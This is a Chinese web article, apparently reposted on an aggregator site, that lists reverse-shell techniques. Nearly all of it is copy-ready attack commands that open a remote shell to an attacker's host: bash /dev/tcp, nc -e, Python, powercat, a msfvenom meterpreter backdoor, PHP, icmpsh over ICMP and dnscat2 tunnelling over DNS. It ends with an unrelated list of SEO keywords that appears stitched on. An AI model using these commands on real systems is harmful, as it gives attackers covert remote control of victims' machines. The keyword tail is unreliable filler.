反弹shell有哪些
发表于:2025-02-23 作者:千家信息网编辑
千家信息网最后更新 2025年02月23日,这篇文章将为大家详细讲解有关反弹shell有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。1.bash反弹bash -i >& /dev/tcp/ip_addr
千家信息网最后更新 2025年02月23日反弹shell有哪些
这篇文章将为大家详细讲解有关反弹shell有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
1.bash反弹
bash -i >& /dev/tcp/ip_address/port 0>&1
2.nc反弹
nc -e /bin/sh 192.168.2.130 4444
3.python
import socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "192.168.2.130" , 4444 ))os.dup2(s.fileno(), 0 )os.dup2(s.fileno(), 1 )os.dup2(s.fileno(), 2 )p = subprocess.call([ "/bin/bash" , "-i" ])
4.powercat
Import-Module .\powercat.ps1powercat -c 192.168.2.130 -p 4444 -e cmd.exe
5.msf生成exe后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
6.php反弹shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
7.ICMP
关闭icmp响应,不然shell一直跳,恢复是0sysctl -w net.ipv4.icmp_echo_ignore_all=1python icmpsh_m.py 源 目标python icmpsh_m.py 192.168.2.137 192.168.2.135
在windows7运行:
icmpsh.exe -t 192.168.2.137
8.DNS
https://downloads.skullsecurity.org/dnscat2/
这里我们使用dnscat2,这里是下载的,分为windows和linux版本,服务端和客户端。
并且推荐使用vs2008编译
安装
git clone https://github.com/iagox86/dnscat2.gitcd dnscat2cd serversudo gem install bundlerbundle installsudo ruby ./dnscat2.rb
kali
ruby dnscat2.rb --dns host=0.0.0.0,port=53531ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)ruby dnscat2.rb xxx.com
windows7中:
./dnscat --dns server=192.168.2.130,port=53531./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)./dnscat xxx.com
连接成功后
查看记录
选择连接
使用shell
返回选择shell
执行命令
其他命令
quit (退出控制台)kill(中断通道)set(设值,比如设置security=open)windows(列举出所有的通道)window -i (连接某个通道)连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):clear(清屏)delay(修改远程会话超时时间)exec(执行远程机上的程序)shell(得到一个反弹shell)download/upload(两端之间上传下载文件)supend(返回到上一层,等于快捷键ctrl+z)
DNS隧道转发
listen 127.0.0.1:6666 192.168.2.135:80本机的6666就可以访问80端口
关于"反弹shell有哪些"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
命令
通道
篇文章
密钥
更多
选择
不错
实用
成功
上传下载
两端
之间
内容
单个
后跟
后门
客户
客户端
快捷键
控制台
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
X5675是不是服务器内存
ccrc网络安全汇报
旧电脑变成一体服务器
连云港专业联想服务器厂家直供
知名专业软件开发公司
软件设计数据库设计要求
数据库表密码加密
软件开发年度目标分解
软件开发文件包括哪些内容
武汉达梦数据库最近新闻
融媒体中心网络安全宣传
网络安全设计ppt
做好假期期间网络安全
无锡服务器机房搭建服务
提高网络安全技术有哪些0
herb数据库网址
新加坡网络安全概念股
杭州教育网络安全知识网络竞赛
西安国内软件开发公司排行
服务器安全面板怎么拆
wi fi热点数据库
X5675是不是服务器内存
网狐数据库生成ID个数
阿里云服务器c盘扩容
旅游软件开发方案模板
我的世界服务器删mod
被移动到服务器
excel保存到服务器
ai网络安全找工作
网络安全周定西